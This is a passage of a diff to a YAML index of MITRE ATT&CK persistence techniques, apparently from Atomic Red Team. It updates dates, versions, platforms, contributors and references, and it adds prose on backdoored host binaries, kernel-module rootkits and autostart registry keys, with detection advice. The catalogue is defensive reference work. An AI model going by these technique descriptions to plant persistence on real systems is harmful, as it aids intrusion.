         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -32174,7 +32599,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -32263,24 +32687,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -32294,7 +32721,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -32309,6 +32736,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -32322,11 +32754,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32352,7 +32783,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32366,7 +32796,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32393,8 +32822,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32405,7 +32834,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32446,7 +32876,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32466,12 +32896,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -32525,11 +32954,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -32616,9 +33044,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -32631,12 +33059,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests: []
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32649,9 +33076,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -32660,13 +33089,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -32714,14 +33143,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -32757,16 +33183,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -32807,7 +33232,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: GCP - Delete Service Account Key
@@ -32886,138 +33310,137 @@ persistence:
           terraform apply -auto-approve
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -33054,7 +33477,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -33080,12 +33503,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -33163,9 +33584,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -33192,7 +33612,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
